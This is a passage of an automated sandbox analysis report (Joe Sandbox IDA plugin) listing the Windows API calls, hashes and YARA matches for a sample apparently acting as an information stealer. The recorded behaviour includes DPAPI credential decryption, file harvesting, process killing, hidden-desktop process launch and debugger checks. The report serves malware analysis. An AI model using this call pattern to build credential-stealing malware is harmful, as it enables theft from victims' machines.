                                                              • GetProcAddress.KERNEL32(006390E0,00638A64), ref: 024966B1
                                                              • GetProcAddress.KERNEL32(006390E0,00638A50), ref: 024966C9
                                                              • GetProcAddress.KERNEL32(006390E0,00638AF8), ref: 024966E2
                                                              • GetProcAddress.KERNEL32(006390E0,00638CD4), ref: 024966FA
                                                              • GetProcAddress.KERNEL32(006390E0,00638B3C), ref: 02496712
                                                              • GetProcAddress.KERNEL32(006390E0,00638DA0), ref: 0249672B
                                                              • GetProcAddress.KERNEL32(006390E0,00638D48), ref: 02496743
                                                              • GetProcAddress.KERNEL32(006390E0,00638BBC), ref: 0249675B
                                                              • GetProcAddress.KERNEL32(006390E0,00638AE8), ref: 02496774
                                                              • GetProcAddress.KERNEL32(006390E0,00638E0C), ref: 0249678C
                                                              • GetProcAddress.KERNEL32(006390E0,006388B0), ref: 024967A4
                                                              • GetProcAddress.KERNEL32(006390E0,00638D98), ref: 024967BD
                                                              • GetProcAddress.KERNEL32(006390E0,00638A24), ref: 024967D5
                                                              • GetProcAddress.KERNEL32(006390E0,00638C18), ref: 024967ED
                                                              • GetProcAddress.KERNEL32(006390E0,00638E34), ref: 02496806
                                                              • GetProcAddress.KERNEL32(006390E0,006388BC), ref: 0249681E
                                                              • GetProcAddress.KERNEL32(006390E0,0063892C), ref: 02496836
                                                              • GetProcAddress.KERNEL32(006390E0,00638AB0), ref: 0249684F
                                                              • LoadLibraryA.KERNEL32(00638D50,?,?,?,02491E4A), ref: 02496860
                                                              • LoadLibraryA.KERNEL32(0063897C,?,?,?,02491E4A), ref: 02496872
                                                              • LoadLibraryA.KERNEL32(00638904,?,?,?,02491E4A), ref: 02496884
                                                              • LoadLibraryA.KERNEL32(006389DC,?,?,?,02491E4A), ref: 02496895
                                                              • LoadLibraryA.KERNEL32(00638B28,?,?,?,02491E4A), ref: 024968A7
                                                              • GetProcAddress.KERNEL32(00638EF8,00638CAC), ref: 024968C4
                                                              • GetProcAddress.KERNEL32(00639020,00638C24), ref: 024968E0
                                                              • GetProcAddress.KERNEL32(00639020,006389CC), ref: 024968F8
                                                              • GetProcAddress.KERNEL32(00639114,00638B94), ref: 02496914
                                                              • GetProcAddress.KERNEL32(00638FD4,00638928), ref: 02496930
                                                              • GetProcAddress.KERNEL32(00639004,00638C14), ref: 0249694C
                                                              • GetProcAddress.KERNEL32(00639004,00435864), ref: 02496963
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad
                                                              • String ID:
                                                              • API String ID: 2238633743-0
                                                              • Opcode ID: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                              • Instruction ID: 68a24db6909e5046a650a0bfab6f4278826e85f0ef24f2fcffda4cf9f8fe41fe
                                                              • Opcode Fuzzy Hash: 6449b651883f695d93b67212a5df6ceba36c024cf5877ce71f6b3492c786d892
                                                              • Instruction Fuzzy Hash: 5DA16FB9A117009FD758DF65EE88A663BBBF789344300A51DF94683360DBB4A900DFB0
                                                              APIs
                                                              • wsprintfA.USER32 ref: 0248CF63
                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0248CF7A
                                                              • lstrcat.KERNEL32(?,?), ref: 0248CFC6
                                                              • StrCmpCA.SHLWAPI(?,00431D70), ref: 0248CFD8
                                                              • StrCmpCA.SHLWAPI(?,00431D74), ref: 0248CFF2
                                                              • wsprintfA.USER32 ref: 0248D017
                                                              • PathMatchSpecA.SHLWAPI(?,00638D64), ref: 0248D049
                                                              • CoInitialize.OLE32(00000000), ref: 0248D055
                                                                • Part of subcall function 0248CE47: CoCreateInstance.COMBASE(0042B140,00000000,00000001,0042B130,?), ref: 0248CE6D
                                                                • Part of subcall function 0248CE47: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0248CEAD
                                                                • Part of subcall function 0248CE47: lstrcpyn.KERNEL32(?,?,00000104), ref: 0248CF30
                                                              • CoUninitialize.COMBASE ref: 0248D070
                                                              • lstrcat.KERNEL32(?,?), ref: 0248D095
                                                              • lstrlen.KERNEL32(?), ref: 0248D0A2
                                                              • StrCmpCA.SHLWAPI(?,0042D01C), ref: 0248D0BC
                                                              • wsprintfA.USER32 ref: 0248D0E4
                                                              • wsprintfA.USER32 ref: 0248D103
                                                              • PathMatchSpecA.SHLWAPI(?,?), ref: 0248D117
                                                              • wsprintfA.USER32 ref: 0248D13F
                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0248D158
                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0248D177
                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 0248D18F
                                                              • CloseHandle.KERNEL32(00000000), ref: 0248D19A
                                                              • CloseHandle.KERNEL32(00000000), ref: 0248D1A6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0248D1BB
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0248D1FB
                                                              • FindNextFileA.KERNEL32(?,?), ref: 0248D2F4
                                                              • FindClose.KERNEL32(?), ref: 0248D306
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                                              • String ID:
                                                              • API String ID: 3860919712-0
                                                              • Opcode ID: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                              • Instruction ID: ff26eb89441c16f8996c5559f7b5780920d7cb508b6ebe29523b2f7b39abe8d3
                                                              • Opcode Fuzzy Hash: 93052ce76f591f400bb700008cd2802628dd2863f39c4ee98d5ebc68cfc5facc
                                                              • Instruction Fuzzy Hash: 7CC16071910219EFDB54EF64DC44FEE77BAAF48304F00459AF919A7290DB74AA84CFA0
                                                              APIs
                                                              • CreateDesktopA.USER32(?), ref: 00409888
                                                              • memset.MSVCRT ref: 004098A6
                                                              • lstrcatA.KERNEL32(?,?), ref: 004098BB
                                                              • lstrcatA.KERNEL32(?,?), ref: 004098CD
                                                              • lstrcatA.KERNEL32(?,00435128), ref: 004098DD
                                                              • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040991A
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00409950
                                                              • StrStrA.SHLWAPI(?,00A0E8C0), ref: 00409965
                                                              • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00409982
                                                              • lstrlenA.KERNEL32(?), ref: 00409996
                                                              • wsprintfA.USER32 ref: 004099A6
                                                              • lstrcpy.KERNEL32(?,?), ref: 004099BD
                                                              • memset.MSVCRT ref: 004099D3
                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000), ref: 00409A32
                                                              • Sleep.KERNEL32(00001388), ref: 00409A41
                                                              • CloseDesktop.USER32(?), ref: 00409A81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$CreateDesktoplstrcpymemset$CloseFolderPathProcessSleeplstrcpynlstrlenwsprintf
                                                              • String ID: %s%s$D
                                                              • API String ID: 3850938096-433275411
                                                              • Opcode ID: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
                                                              • Instruction ID: a7c648236efd38c04947cc9f358bb87a81258cd583e53001e760b02128fb778b
                                                              • Opcode Fuzzy Hash: 3b7bcb9baf172843c3db97fc7ed1e7ea6609f5e64af5040f656d43d3bd13194b
                                                              • Instruction Fuzzy Hash: 606173B1204340AFD720EF64DC45F9B77E9AF88704F00492EF649972E1DBB49904CBA6
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471849
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02471880
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 024718D3
                                                              • lstrcat.KERNEL32(00000000), ref: 024718DD
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 02471909
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02471A5A
                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02471A65
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat
                                                              • String ID:
                                                              • API String ID: 2276651480-0
                                                              • Opcode ID: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                              • Instruction ID: 7e2b7ac3f440551a41734e3c340a8c8f6b610661a24696af02e48bea941602de
                                                              • Opcode Fuzzy Hash: 2de634e515e40bf3d02188b1823f2cee3bbfe8e5fb617657e8324fce15409c4d
                                                              • Instruction Fuzzy Hash: 41815271900656DBDB21EFB9CC84AEE7BB6AF44309F04012AEC29A7251DB74DD01DFA0
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246D9
                                                              • Process32First.KERNEL32(00000000,00000128), ref: 004246E9
                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 004246FB
                                                              • StrCmpCA.SHLWAPI(?,?), ref: 0042470D
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424722
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424731
                                                              • CloseHandle.KERNEL32(00000000), ref: 00424738
                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 00424746
                                                              • CloseHandle.KERNEL32(00000000), ref: 00424751
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                              • String ID:
                                                              • API String ID: 3836391474-0
                                                              • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                              • Instruction ID: acde96e121e2a7afcea3315a204f3f85e54aecaf4105e29a1c9688e5f6c36e20
                                                              • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                                                              • Instruction Fuzzy Hash: 6301A1316012246BE7205B60AC88FFB777DEB85B81F00109DF90596280EFB499408FB4
                                                              APIs
                                                                • Part of subcall function 02497477: lstrcpy.KERNEL32(00000000,ERROR), ref: 02497495
                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02492FA2
                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 02492FB4
                                                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02492FC1
                                                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 02492FF3
                                                              • LocalFree.KERNEL32(00000000), ref: 024931D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                              • String ID: /
                                                              • API String ID: 3090951853-4001269591
                                                              • Opcode ID: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                              • Instruction ID: 74559ffaa9ef80319cb974013e8fad3ed6b1bcbd94419037a6bab134727641ca
                                                              • Opcode Fuzzy Hash: 7671fc27ad4a2ad92b930ab996fc11a614c7b477747d6adc6e497c6ecca29900
                                                              • Instruction Fuzzy Hash: 18B1C771900205CFDB15CF54C948B95BBB2BB85329F29C1EAD409AB3B5D7769C82CF90
                                                              APIs
                                                              • memset.MSVCRT ref: 0247F022
                                                              • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0247F03D
                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0247F045
                                                              • memcpy.MSVCRT(?,?,?), ref: 0247F0B8
                                                              • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0247F0EE
                                                              • lstrcat.KERNEL32(0042D01C,0042D01C), ref: 0247F110
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                              • String ID:
                                                              • API String ID: 1498829745-0
                                                              • Opcode ID: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                              • Instruction ID: 22628b09a24507406c6e4512747ffebf2f1afc930c3d98aa72dd72e195febe7b
                                                              • Opcode Fuzzy Hash: 5fe68cfddfdb507885f88cbc14fa978923ecc3c3b8c5ac6e013f8490b7f9ee3c
                                                              • Instruction Fuzzy Hash: 0E31C175B00229ABDB109B98EC45BEFB779EF44705F04417AFA09E3240DBB49A04CBE5
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 02492E49
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02492E50
                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 02492E5F
                                                              • wsprintfA.USER32 ref: 02492E8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                              • String ID: wwww
                                                              • API String ID: 3317088062-671953474
                                                              • Opcode ID: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                              • Instruction ID: e9c62a63f3c2ca32bbc0564ce27a459f27b75b7565f9db03803b4b3e3c101b61
                                                              • Opcode Fuzzy Hash: f69004c5f71f610b6d547f6432eddab92af069e70ec5a533afdf3a811bdd1a6c
                                                              • Instruction Fuzzy Hash: 9401F771A04614ABCB188F58DC4AB6ABB6EE784720F10432AFD16D73C0D7B419008AE5
                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32 ref: 02498699
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 024986AE
                                                              • UnhandledExceptionFilter.KERNEL32(0042C2C0), ref: 024986B9
                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 024986D5
                                                              • TerminateProcess.KERNEL32(00000000), ref: 024986DC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                              • String ID:
                                                              • API String ID: 2579439406-0
                                                              • Opcode ID: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                              • Instruction ID: 17e4920f2f4915ccd9c00a34b7a2c3c2990c17fa8da9d0d0681629aaa342014c
                                                              • Opcode Fuzzy Hash: 6f8c16cd750ee8837aff1e30bd80a1a9b619af74afdd13ae9f3795960fce2a3f
                                                              • Instruction Fuzzy Hash: 2C21F0B59103069FCB60DF15F984A49BBB4FB28304F50603EF51887B61EBB069858F5D
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                              • HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                              • LocalFree.KERNEL32(?), ref: 004076F7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                              • String ID:
                                                              • API String ID: 3657800372-0
                                                              • Opcode ID: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                              • Instruction ID: fc53f040804026e33a48c705a0d2581fa71e9ff24b93ea351c491559a1666898
                                                              • Opcode Fuzzy Hash: 409e78fb13d6794445940b5c0aff07b763ad56f8c0cd95c9c67de4eede8e8ce7
                                                              • Instruction Fuzzy Hash: 3A011E75B40318BBEB14DBA49C4AFAA7779EB44B15F104159FB09EB2C0D6B0A9008BE4
                                                              APIs
                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240AD
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240BC
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 004240C3
                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 004240F3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BinaryCryptHeapString$AllocProcess
                                                              • String ID:
                                                              • API String ID: 3939037734-0
                                                              • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                              • Instruction ID: d2b09a1c624c39b133de08918eaa2f92ad29e846d2d732d6bc326f324e173560
                                                              • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                              • Instruction Fuzzy Hash: B0011E70600215ABDB149FA5EC85BAB7BADEF85711F108059BE0987340DA7199408BA4
                                                              APIs
                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 02494314
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 02494323
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0249432A
                                                              • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 0249435A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BinaryCryptHeapString$AllocateProcess
                                                              • String ID:
                                                              • API String ID: 3825993179-0
                                                              • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                              • Instruction ID: 058fe40762a17df480516b8e175251de1deb25d74b7a33d0f20afe0ee27dbd4c
                                                              • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                                                              • Instruction Fuzzy Hash: AA011A70600205ABDB249FA5EC89BABBBADEF85315F104159BD0987340DBB1E9418BA0
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409BFF
                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 00409C13
                                                              • memcpy.MSVCRT(00000000,?), ref: 00409C2A
                                                              • LocalFree.KERNEL32(?), ref: 00409C37
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                              • String ID:
                                                              • API String ID: 3243516280-0
                                                              • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                              • Instruction ID: abf8395257343a8b015b9f0b6c8a158c8b551f0c270fe32e84b7b64ff486a2c6
                                                              • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                              • Instruction Fuzzy Hash: F701FB75E41309ABE7109BA4DC45BAAB779EB44700F504169FA04AB380DBB09E008BE4
                                                              APIs
                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 02479E66
                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 02479E7A
                                                              • memcpy.MSVCRT(00000000,?), ref: 02479E91
                                                              • LocalFree.KERNEL32(?), ref: 02479E9E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                              • String ID:
                                                              • API String ID: 3243516280-0
                                                              • Opcode ID: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
                                                              • Instruction ID: 0e71142eea7e60c10469a1b78ce3e8aa22993320c20d6bc7a98a8d70d4a2832e
                                                              • Opcode Fuzzy Hash: d6986c5c4f938f64ac158f86dd5ebf18f182eae35123fd4b82889631517280d4
